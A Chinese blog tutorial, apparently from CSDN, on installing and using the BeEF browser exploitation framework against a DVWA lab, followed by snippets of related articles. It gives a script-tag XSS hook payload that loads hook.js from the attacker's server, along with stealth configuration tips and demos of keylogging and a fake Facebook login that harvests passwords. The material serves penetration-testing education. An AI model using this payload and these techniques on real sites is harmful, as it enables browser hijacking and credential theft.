XSS漏洞利用工具BeEF

最新推荐文章于 2024-07-08 02:12:58 发布
最新推荐文章于 2024-07-08 02:12:58 发布
阅读量691 收藏 5
点赞数 1
文章标签: xss 前端 BeEF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_41647119/article/details/105164391
版权

BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,并从浏览器上下文中对系统进行进一步攻击。它是一个专注于Web浏览器的渗透测试工具。本文将对BeEF工具的使用进行简单介绍。对于XSS漏洞的原理介绍请参考上一篇文章。

一、获取BeEF

1.1 源码安装

BeEF仅支持Mac OSX 10.5.0或更高版本以及Linux平台安装。不支持Windows操作系统。
安装环境要求:
Ruby:2.5或更高版本
SQLite: 3.x
Node.js: 6 或更高版本
Beef源码地址:https://github.com/beefproject/beef
具体安装步骤参照百度beef安装教程。

1.2 kali集成BeEF

BeEF作为一款主流的XSS漏洞利用工具kali自然集成了BeEF功能再里边。启动kali在“漏洞利用工具集”中可以找到“beef xss framework”功能点击即可启动BeEF。

二、BeEF的使用

2.1 启动beef

我们使用kali举例,当点击“beef xss framework”后kali会启动一个终端来运行beef程序如下图所示。说明beef已经启动成功。
beef启动启动后注意终端信息中有两个连接:
http://127.0.0.1:3000/ui/panel为beef本地管理终端
http://IP:3000/hook.js为beef注入脚本(修改为本机实际IP地址即可)
打开本地管理终端如下图所示:
beef登录终端需要登录密码默认账号是:beef、默认密码是:beef。
我们可以在配置文件中修改,

2.2 配置beef

beef的配置文件地址为:/usr/share/beef-xss/config.yaml
简单了解一下配置文件,如下图
beef配置文件

指定某个网段,只有在这个网段的浏览器才能被hook
permitted_hooking_subnet: “0.0.0.0/0”

指定某个网段,只有在这个网段的浏览器才能访问管理UI
permitted_ui_subnet: “0.0.0.0/0”

设置beef服务器的主机和端口, 如果有自己的域名, 那么可以设置自己的域名, 没有就使用默认
host: “0.0.0.0”
port: “3000”

受害浏览器轮询beef主机的时间, 默认为1秒,可以设置为更低。
xhr_poll_timeout: 1000

管理页面的URI, 默认是/ui, 建议修改,这样就不会让别人找到你的管理页面
web_ui_basepath: “/ui”

hook_file 的名称, 建议修改, 可以修改为jquery.js之类的来提升隐蔽性
hook_file: “/hook.js”

管理页面登录的用户名和密码, 这个一定要改,两个都改是最好的
user: “beef”
passwd: “beef”

2.3 演示攻击

我们使用DVWA作为靶机进行演示将如下脚本地址插入到存在XSS漏洞的注入点上。

<script src=http://<IP>:3000/hook.js></script>

DVWA之XSS提交后就可以在beef的管理端查看管理靶机浏览器了,到这里我们已经轻松的借助beef利用XSS漏洞获得了浏览器的控制权。接下来就看beef利用XSS漏洞都能做那些事。
beef

2.4 beef功能介绍

我们点击当前在线的主机,然后右边会有选择框,我们点击 Current Browser ,然后下面就有一些功能项:Details、Logs、Commands、Rider、XssRays、Ipec、Network、WebRTC
1、Details-浏览器信息详情
2、logs-键盘记录
3、commands-命令模块

绿色圆圈:表示模块适合目标浏览器,并且执行结果对客户端不可见
红色圆圈:表示模块不适用与当前用户,有些红色模块也可以正常执行
橙色圆圈:模块可用,但结果对用户可见(CAM 弹窗申请权限)
灰色圆圈:模块未在目标浏览器上测试过

命令模块是beef提供给我们的漏洞利用模块,在这里你可以做很多事情。攻击模块如下图所示,共有12个大的功能,每个大模块下边有各种小的功能。
在这里要注意:攻击只可以在测试机器中进行。
beef利用我们举一个简单的例子:
在Social Engineering社会工程学模块中点击Pretty Theft骗取登录密码信息,我们选择Facebook举例。
beef目前beef支持多种账号信息的欺骗,效果如图,在靶机浏览器中弹出Facebook登录框提示用户输入账号密码。
facebook当用户在输入框输入账号密码信息时,beef管理端就会接收到用户输入。beef的功能有很多在这里不一一演示。

默认情况下JS注入附带缓存投毒功能,将视图缓存所有的页面至2099年,但可以通过清除所有缓存及浏览数据来清除缓存投毒的影响。
js缓存投毒说白了就是受害者的浏览器缓存了一个被我们篡改的js脚本,如果缓存没有被清除,每次这个受害者访问网页的时候都会加载我们的js脚本。js缓存投毒说白了就是受害者的浏览器缓存了一个被我们篡改的js脚本,如果缓存没有被清除,每次这个受害者访问网页的时候都会加载我们的js脚本。

birdhan
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux漏洞利用工具集目录v2018.2大学霸陆小马功钟浩.pdf
09-14
总结来说,本文件详细介绍了Kali Linux漏洞利用工具集的使用方法和实例演示,这不但包含了一些核心工具的介绍,如Armitage、BeEF、SQLmap,还包括了关于如何安装和设置这些工具的建议,这些内容对于想要深入学习渗透...
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4701
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
XSS-Loader Tools:您的全方位XSS攻击解决方案
gitblog_00061的博客
06-08 465
XSS-Loader Tools:您的全方位XSS攻击解决方案 项目地址:https://gitcode.com/capture0x/XSS-LOADER 项目简介 XSS-Loader Tools是由Hulya Karabag编写的开源工具,集成了XSS漏洞的payload生成器、扫描器和Dork查找器。这个强大的工具能够帮助安全研究人员和测试人员有效地发现和利用XSS(跨站脚本)漏洞。 项目...
XSS利器之BeEF
最新发布
weixin_32643811的博客
07-08 21
BeEF安装beefsudo apt install beefsudo beef -xss设置密码在上述页面中,给我们提供了两条信息,一条是BEEFXSS引用地址,即本地IP3000端口下的hook.js;另一条是BEEF的管理页面,即本地地址/ui/panel。我们此时可以看到在当前Kali Linux已经开始监听30...
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7444
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4137
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6567
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
一个好玩的工具BeEF介绍
luluoluoa的博客
05-07 1841
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息、键盘记录、社会工程等 总之就是使用beef这个工具来利用xss漏洞的 beef安装 我在kail虚拟机上安装的,很简单的在终端输入一句命令sudo apt setup beef-xss,然后安装成功设置密码就行了,因为之后在浏览器打开需要登陆,登陆名beef,密码就是安装时设置的那个 beef打开 在终端输入命令beef
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
1. 在一个已知存在XSS漏洞的站点(如pikachu)上,利用XSS留言板,插入包含Beef链接的JavaScript脚本`地址:3000/hook.js></script>`。 2. 当其他用户访问含有恶意脚本的页面时,Beef-xss会捕获到连接,并能控制用户...
xss跨站脚本攻击
05-26
Beef为例,可以构建一个简单的应用场景:攻击者通过XSS漏洞注入一段JavaScript代码,该代码会将用户的浏览器与Beef服务器连接起来。当用户访问包含恶意脚本的页面时,他们的浏览器就会被hook,进而成为攻击者的...
网络渗透测试 XSS和SQL注入
12-02
攻击者通过XSS漏洞获取Cookie,就能冒充用户身份进行活动。因此,保护Cookie的安全性至关重要,包括使用HTTPS协议、设置HTTP Only flag来防止脚本访问Cookie,以及限制Cookie的生命周期。 SQL注入则是攻击者通过...
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1419
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
Beefxss使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1175
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
beef-xss安装与使用
Bu2n的博客
12-07 3370
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 6034
xss-工具-Beef-Xss安装以及使用
这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具
jklbnm12的博客
07-22 2536
功能说明获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据键盘记录功能。
专门检测xss漏洞的检测工具
06-01
以下是几款专门检测XSS漏洞的检测工具: 1. XSStrike:是一款功能强大的XSS扫描器,可以检测存储型、反射型和DOM型XSS漏洞,并提供了多种漏洞利用方式。 2. XSS Hunter:是一款简单易用的XSS扫描器,可以自动检测反射型和存储型XSS漏洞,并提供了多种漏洞利用方式。 3. BeEF:是一款强大的浏览器漏洞利用框架,可以用于检测和利用多种Web漏洞,包括XSS漏洞。 4. W3af:是一款开源的Web应用程序漏洞扫描器,可以检测多种Web漏洞,包括XSS漏洞。 5. Arachni:是一款功能强大的Web应用程序漏洞扫描器,可以检测多种Web漏洞,包括XSS漏洞。 请注意,在使用任何漏洞检测工具之前,请确保您已经获得了授权,并已经获得了目标网站的所有者的明确许可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值